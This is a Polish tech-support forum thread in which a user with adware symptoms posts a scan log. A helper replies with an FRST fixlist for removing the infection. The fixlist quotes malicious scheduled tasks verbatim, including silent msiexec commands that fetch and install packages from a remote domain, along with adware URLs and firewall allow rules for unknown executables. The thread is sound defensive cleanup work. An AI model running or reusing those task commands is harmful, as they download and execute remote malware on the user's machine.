Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Proszę o sprawdzenie logów

CMK1990 15 Lis 2018 09:28 60 2
  • #1 15 Lis 2018 09:28
    CMK1990
    Poziom 21  

    Hej, mam problem z laptopem. Zazwyczaj radziłem sobie sam ale teraz już brak mi pomysłów.
    Komputer sam otwiera karty w chromie z reklamami, sam wciska wstecz w przeglądarce.
    W załączeniu log skanu z FRST.

    0 2
  • Pomocny post
    #2 15 Lis 2018 09:46
    Kolobos
    Spec od komputerów

    Zachcialo sie
    2018-10-23 09:51 - 2018-10-23 09:51 - 000108880 _____ C:\Users\CmK\Downloads\mafia-iii-digital-deluxe-edition-v1_090_0_1-6-dlc.torrent
    i takie sa efekty.

    Fixlist.txt dla FRST:
    CloseProcesses:
    Task: {02E20DBA-8495-42BC-B484-B17CF7024D3E} - System32\Tasks\Opera scheduled Autoupdate 1525760339 => C:\Program Files\Opera\launcher.exe [2018-11-06] (Opera Software)
    Task: {3D47D870-F207-452B-AE70-DD3F975B6202} - System32\Tasks\{CEB3C62A-1734-4F8A-8C6E-DCD6A5CCE707} => C:\Windows\system32\pcalua.exe -a D:\R292194.exe -d D:\
    Task: {44BDA632-E2A8-4C11-8FD3-E6689488F9A5} - System32\Tasks\{B57FF6FD-BFBA-814F-621B-667E200F45CB} => "msiexec" /package hxxp://inthemel.info/0kxunx8mfvmy.ygr -q
    Task: {659553B7-248D-4070-8CE7-080F7789E7B9} - System32\Tasks\{CB237794-0AD8-45A8-A4F2-862338273105} => C:\Windows\system32\pcalua.exe -a C:\Users\CmK\Downloads\R294095.exe -d C:\Users\CmK\DownloadsTask: {68633843-9F7A-4696-B505-6722EC82F588} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
    Task: {9B70C8F0-DC17-4D33-B590-96975D26C086} - System32\Tasks\{6956B723-5277-015F-A929-8241CD618091} => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" hxxp://mynewsfor.net/cl/?guid=s7yznrlwwvfk99sn6gekkfmp3g4ehji0&prid=1&pid=4_1324_0
    Task: {C057DBEF-FCBC-479A-85CE-332345F61A6C} - System32\Tasks\{58D9AFD3-FB5A-3504-4F21-AD13617B5882} => "msiexec.exe" -q -i hxxp://inthemel.info/ktzsckpqmbod.maq
    Task: {DCF98B72-F6B2-4EB6-A28F-C49FAB70A087} - System32\Tasks\{E346EA17-D289-4158-A2B1-A8A87BE95811} => C:\Windows\system32\pcalua.exe -a D:\R292473.exe -d D:\
    Task: {F1DD8F1A-3C7F-4C88-88DB-EB397DF6F6D3} - System32\Tasks\{76CDA452-C252-4411-917A-C66A50CA4B22} => C:\Windows\system32\pcalua.exe -a D:\R292253.exe -d D:\
    HKU\S-1-5-21-3463180217-101845397-200721854-1001\...\MountPoints2: {cc7a9c3f-d5e4-11e8-87e9-4c8093536604} - "J:\setup.EXE" /AUTORUN
    GroupPolicy: Ograniczenia ? <==== UWAGA
    2018-10-23 09:52 - 2018-10-23 09:52 - 000003858 _____ C:\WINDOWS\System32\Tasks\{6956B723-5277-015F-A929-8241CD618091}
    2018-10-23 09:52 - 2018-10-23 09:52 - 000003672 _____ C:\WINDOWS\System32\Tasks\{58D9AFD3-FB5A-3504-4F21-AD13617B5882}
    2018-10-23 09:52 - 2018-10-23 09:52 - 000003476 _____ C:\WINDOWS\System32\Tasks\{B57FF6FD-BFBA-814F-621B-667E200F45CB}
    2018-10-23 09:52 - 2018-10-23 09:52 - 000000002 _____ C:\Users\CmK\AppData\Local\imw.ini
    2018-04-12 00:34 - 2018-04-12 00:34 - 000060416 ____N (Microsoft Corporation) C:\Program Files (x86)\ygeGO.exe
    2018-04-12 00:34 - 2018-04-12 00:34 - 000178688 ____N (Microsoft Corporation) C:\Users\CmK\AppData\Local\fJRiFwoT.exe
    2018-10-23 09:52 - 2018-10-23 09:52 - 000000002 _____ () C:\Users\CmK\AppData\Local\imw.ini
    2018-04-12 00:34 - 2018-04-12 00:34 - 000060416 ____N (Microsoft Corporation) C:\Users\CmK\AppData\Local\uUCgYOi.exe
    FirewallRules: [{0CAFACB6-F0D0-441C-BF18-E7BC143938DF}] => (Allow) C:\Program Files (x86)\ygeGO.exe
    FirewallRules: [{F64F6BC0-209C-491E-98B0-B1D9A2DF1A74}] => (Allow) C:\Users\CmK\AppData\Local\uUCgYOi.exe

    Po wykonnaiu usun katalog C:\FRST i to wszystko.

    0
  • #3 15 Lis 2018 10:20
    CMK1990
    Poziom 21  

    Dzięki wielkie o to chodziło. Już wykonuję i jeśli będzie efekt zamykam temat.

    0